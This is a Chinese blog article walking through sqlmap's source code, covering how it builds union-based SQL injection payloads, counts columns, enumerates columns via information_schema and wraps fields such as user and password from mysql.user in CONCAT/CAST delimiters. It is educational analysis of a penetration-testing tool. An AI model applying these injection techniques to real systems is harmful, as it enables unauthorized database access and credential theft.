sqlmap源码解读(2)

阅读量220431

|评论1

|

发布时间 : 2021-07-23 16:30:09

 

回顾

上一篇主要说了SQLMAP从main如何一步一步运行到action()函数,然后我对MySQL的版本识别和识别确认进行了具体的分析。其中暂未分析的inject.getValue函数至关重要,将是我们这一节的关键部分;另外识别到DBMS之后,如何做进一步的注入也是需要关注的点

 

ExpandAsteriskForColumns

inject.getValue函数能够根据传入的payload直接的得到返回结果,例如mysql识别插件这一部分

query = "CONCAT('%s', '%s')" % (randInt, randInt)

if inject.getValue(query) == (randInt * 2):
    logMsg = "confirming MySQL"

输入CONCAT(1,1),判断返回是否是11,这个11应该是如何得到的呢?这也是做自动化注入工具的难点

看到getValue前两行做了一个前置处理

expression = cleanQuery(expression)
expression = expandAsteriskForColumns(expression)

cleanQuery作用比较简单,将部分小写全部替换为大写

def cleanQuery(query):
    upperQuery = query.replace("select ", "SELECT ")
    upperQuery = upperQuery.replace(" from ", " FROM ")
    upperQuery = upperQuery.replace(" limit ", " LIMIT ")
    upperQuery = upperQuery.replace(" offset ", " OFFSET ")
    upperQuery = upperQuery.replace(" order by ", " ORDER BY ")
    upperQuery = upperQuery.replace(" group by ", " GROUP BY ")
    upperQuery = upperQuery.replace(" union all ", " UNION ALL ")

    return upperQuery

expandAsteriskForColumns作用是把SELECT * FROM db.table这样语句中的*转为具体列名

首先正则匹配SELECT * FROM db.table

asterisk = re.search("^SELECT\s+\*\s+FROM\s+(\w+)[\.]+(\w+)\s*", expression, re.I)

正则匹配到的db和table保存至全局变量,调用getColumns函数

conf.db = asterisk.group(1)
conf.tbl = asterisk.group(2)
columnsDict = conf.dbmsHandler.getColumns(onlyColNames=True)

跟入getColumns函数,我们以MySQL为例,略过MSSQL和Oracle,因为大同小异。这里调用的queries正是第一篇分析文章一开始提到的queries.xml文章

rootQuery = queries[kb.dbms].columns

例如这里的rootQuery在xml中寻找到对应的部分如下,inband方式的注入是直接从information_schema.COLUMNS里查。对于限制回显数或者其他情况应该采用盲注(这里感觉取名blind不是很合适)的方式,使用LIMIT限制每次查出的数据,并将字段类型和字段名分开查询

<columns>
    <inband query="SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"/>
    <blind query="SELECT column_name FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s' LIMIT %d, 1" query2="SELECT column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"/>
</columns>

回到代码中,PostgreSQL和MySQL都有information_schema库,首先尝试直接查询,也就是inband方式。发现后续又调用inject.getValue函数,将xml中的查询语句作为payload传入,处理得到结果保存至self.cachedColumns[conf.db] = table

if conf.unionUse:
    if kb.dbms in ( "MySQL", "PostgreSQL" ):
        query = rootQuery["inband"]["query"] % (conf.tbl, conf.db)

        value = inject.getValue(query, blind=False)
        if value:
            table = {}
            columns = {}
            for column, colType in value:
                columns[column] = colType
                table[conf.tbl] = columns
                self.cachedColumns[conf.db] = table

如果上述过程没有顺利执行,self.cachedColumns中取不到结果,那么尝试以blind方式(称之为盲注不是很恰当)做执行。后续是对字段总数的查询,如果返回不合法抛出异常

if not self.cachedColumns:
    if kb.dbms in ( "MySQL", "PostgreSQL" ):
        query = rootQuery["blind"]["count"] % (conf.tbl, conf.db)
        count = inject.getValue(query, inband=False, expected="int")
        if not count.isdigit() or not len(count) or count == "0":
            ......
            raise sqlmapNoneDataException, errMsg

后续代码我做了一个简化,只取MySQL关键部分。getRange函数根据数据库类型做了一个划分,MySQL等多数数据库的LIMIT应当从0开始,但Oracle是从1开始。然后以xml的blind方式查列名,LIMIT方式执行多次分页查询后得到所有的列名并保存至self.cachedColumns并return

indexRange = getRange(count)
for index in indexRange:
    if kb.dbms in ( "MySQL", "PostgreSQL" ):
        query = rootQuery["blind"]["query"] % (conf.tbl, conf.db, index)
        colType = inject.getValue(query, inband=False)
        columns[column] = colType
if columns:
    table[conf.tbl] = columns
    self.cachedColumns[conf.db] = table
return self.cachedColumns

回到最开始expandAsteriskForColumns函数,如果取到的self.cachedColumns不为空,认为查到了输入db.table对应的字段名,将表达式中的*替换为table的columns

if columnsDict and conf.db in columnsDict and conf.tbl in columnsDict[conf.db]:
    columns = columnsDict[conf.db][conf.tbl].keys()
    columns.sort()
    columnsStr = ", ".join([column for column in columns])
    expression = expression.replace("*", columnsStr, 1)

    infoMsg  = "the query with column names is: "
    infoMsg += "%s" % expression
    logger.info(infoMsg)

return expression

 

goInband

分析完expandAsteriskForColumns函数,继续看inject.getValue,之前的函数只是做了一个预处理,真正的核心部分是__goInband__goInferenceProxy。逻辑是先调用__goInband尝试得到结果,如果得不到将使用__goInferenceProxy的方式

if inband and conf.unionUse and kb.dbms:
    value = __goInband(expression, expected)

if blind and not value:
    value = __goInferenceProxy(expression, fromUser, expected)

return value

进入goInband函数,代码里其实不小,但仔细观察可以发现,核心函数是output = unionUse(expression),其他部分代码大都是处理sqlmap的保存功能,这部分不难,就是把一些执行结果和状态以[url][注入点][注入参数][表达式][日志]格式保存到本地文件中,如果重复对一个站点做注入,将会读取这样的文件,提高效率。回到主题,我们跟入unionUse函数,在unionUse的一开始,调用了unionTest函数,主要是测试目标是否可以被union select语法注入,核心部分代码删减后如下

value = ""
query = agent.prefixQuery("UNION ALL SELECT NULL")
for comment in ("--", "#", "/*", ";", "%00"):
    value = __effectiveUnionTest(query, comment)
    if value:
        setUnion(comment, value.count("NULL"))
        break
return value

跟入agent.prefixQuery函数,发现是对UNION ALL SELECT NULL拼了一个前缀,前缀是注入的闭合符号,具体如何检测闭合符合我在上一篇文章中有分析到,将闭合符号拼接在payload之前得到一个新的查询payload

query = ""
if kb.injType == "numeric":
    pass
elif kb.injType in ( "stringsingle", "likesingle" ):
    query = "'"
elif kb.injType in ( "stringdouble", "likedouble" ):
    query = "\""
else:
    raise sqlmapNoneDataException, "unsupported injection type"
if kb.parenthesis != None:
        query += "%s " % (")" * kb.parenthesis)
        query += string
return query

 

effectiveUnionTest

继续分析__effectiveUnionTest函数,该函数主要作用是检测有效的payload,我将代码做了一下简化。注意这里传入的query是上文添加了前缀的UNION ALL SELECT NULL,每一次的循环

agent.postfixQuery函数代码如下,它的作用是将传入的[闭合符]+UNION ALL SELECT [n个NULL]根据注入类型变成[闭合符]+UNION ALL SELECT [n个NULL] [注释符] AND [随机变量]=[随机变量]

agent.payload函数代码较简单,是将请求中的参数或请求头根据检测到的注入点替换

Request.queryPage函数的返回值不确定,有可能是Bool,但根据代码后续逻辑判断,不可能是Bool,这个函数的另一个返回值是responseBody的md5,用来校验是否相等的,比纯字符串效率高,值得学习的优化手段

下方的if作用是统计每次循环得到的响应md5不同的次数,次数为该dict的value[0],最终如果能得到的次数为1的情况,就能说明union生效,并且得到了查询字段数,见下图

for count in range(0, 50):
    if count:
        query += ", NULL"
        commentedQuery = agent.postfixQuery(query, comment)
        payload = agent.payload(newValue=commentedQuery)
        newResult = Request.queryPage(payload)

    if not newResult in resultDict.keys():
        resultDict[newResult] = (1, commentedQuery)
    else:
        resultDict[newResult] = (resultDict[newResult][0] + 1, commentedQuery)
    if count:
        for element in resultDict.values():
            if element[0] == 1:
                ......
                return value
def postfixQuery(self, string, comment=None):
        randInt = randomInt()
        randStr = randomStr()
        if comment:
            string += "%s" % comment
        if kb.parenthesis != None:
            string += " AND %s" % ("(" * kb.parenthesis)
        else:
            raise sqlmapNoneDataException, "unable to get the number of parenthesis"
        if kb.injType == "numeric":
            string += "%d=%d" % (randInt, randInt)
        elif kb.injType == "stringsingle":
            string += "'%s'='%s" % (randStr, randStr)
        elif kb.injType == "likesingle":
            string += "'%s' LIKE '%s" % (randStr, randStr)
        elif kb.injType == "stringdouble":
            string += "\"%s\"=\"%s" % (randStr, randStr)
        elif kb.injType == "likedouble":
            string += "\"%s\" LIKE \"%s" % (randStr, randStr)
        else:
            raise sqlmapNoneDataException, "unsupported injection type"
        return string

可以看我的例子,如果select后的null不符合查询字段数,会报错,导致页面返回错误或空。而循环50次期间错误数应该为49次,导致49次的responseBody的md5相等。正确返回次数应为1次,代码中if element[0] == 1才会把value返回出去(这个value类似一个flag,对逻辑没有什么影响)

另外一个小细节,上文两处if count是在第二次循环才触发,因为左闭右开规则

得到的value做了如下的操作,setUnion函数主要是保存了当前状态,然后设置kb.unionCount,也就是查询字段数,在后续构造中有大用

if value:
    setUnion(comment, value.count("NULL"))
    break
if kb.unionCount:
    logMsg  = "the target url could be affected by an "
    logMsg += "inband sql injection vulnerability"
    logger.info(logMsg)

回到最开始的unionUse函数,先看前半部分代码

之前的test如果顺利,那么kb.unionCount将不为空

    if not kb.unionCount:
        return

    # Prepare expression with delimiters
    expression = agent.concatQuery(expression)
    expression = unescaper.unescape(expression)

    # Confirm the inband SQL injection and get the exact column
    # position only once
    if not isinstance(kb.unionPosition, int):
        count = __unionPosition(count, expression)

        # Assure that the above function found the exploitable inband
        # SQL injection position
        if not isinstance(kb.unionPosition, int):
            return

 

concatQuery

首先来看concatQuery函数,这个函数比较复杂

1.使用正则找出查询字段数

    def getFields(self, query):
        fieldsSelectTop      = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
        fieldsSelectDistinct = re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", query, re.I)
        fieldsSelectFrom     = re.search("\ASELECT\s+(.+?)\s+FROM\s+", query, re.I)
        fieldsSelect         = re.search("\ASELECT\s+(.*)", query, re.I)
        fieldsNoSelect       = query

        if fieldsSelectTop:
            fieldsToCast = fieldsSelectTop.groups()[0]
        elif fieldsSelectDistinct:
            fieldsToCast = fieldsSelectDistinct.groups()[0]
        elif fieldsSelectFrom:
            fieldsToCast = fieldsSelectFrom.groups()[0]
        elif fieldsSelect:
            fieldsToCast = fieldsSelect.groups()[0]
        elif fieldsNoSelect:
            fieldsToCast = fieldsNoSelect

        return fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsToCast

2.做一些强制转换,例如VERSION()会被转为IFNULL(CAST(VERSION() AS CHAR(10000)), ' ')IFNULL的作用是如果第一个参数为空就返回第一个,否则第二个。而CAST(VERSION() AS CHAR(10000))VERSION()没什么区别,都是返回版本,这里是一个示范,实际上其他字符串的效果也是一样

nulledCastedField = queries[kb.dbms].cast % field
nulledCastedField = queries[kb.dbms].isnull % nulledCastedField
<cast query="CAST(%s AS CHAR(10000))"/>
<isnull query="IFNULL(%s, ' ')"/>

3.批量转换,例如user,password转为IFNULL(CAST(user AS CHAR(10000)), ' '),'UWciUe',IFNULL(CAST(password AS CHAR(10000)), ' '),其中穿插的这个随机字符串是在Agent的init中生成的,也就是下方代码的temp.delimiter

for field in fieldsSplitted:
    nulledCastedFields.append(self.nullAndCastField(field))

delimiterStr = "%s'%s'%s" % (dbmsDelimiter, temp.delimiter, dbmsDelimiter)
nulledCastedConcatFields = delimiterStr.join([field for field in nulledCastedFields])
class Agent:
    def __init__(self):
        temp.delimiter = randomStr(6)
        ......

4.最终替换,效果是SELECT user, password FROM mysql.user变成CONCAT('mMvPxc',IFNULL(CAST(user AS CHAR(10000)), ' '),'nXlgnR',IFNULL(CAST(password AS CHAR(10000)), ' '),'YnCzLl') FROM mysql.user

if fieldsSelectFrom:
    concatQuery = concatQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1)
    concatQuery = concatQuery.replace(" FROM ", ",'%s') FROM " % temp.stop, 1)
elif fieldsSelect:
    concatQuery  = concatQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1)
    concatQuery += ",'%s')" % temp.stop
elif fieldsNoSelect:
    concatQuery = "CONCAT('%s',%s,'%s')" % (temp.start, concatQuery, temp.stop)

下文的expression = unescaper.unescape(expression)在第一篇简单的说成是编码解码,其实不标准,跟入MySQL的DBMS插件可以看到该函数的作用是将字符串转为CHAR(X),CHAR(Y)这样ASCII码格式

 

unionPosition

继续分析unionUse函数,可以看到__unionPosition这样一个函数,这应该是最核心的部分了。该篇文章篇幅已经很大了,我将在下一篇中继续分析。可以看出,inject.getValue这个函数远比我设想的要复杂多了,当然也可以看出sqlmap的强大之处

本文由1原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/247451

安全客 - 有思想的安全新媒体

分享到:微信
+16赞
收藏
1
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66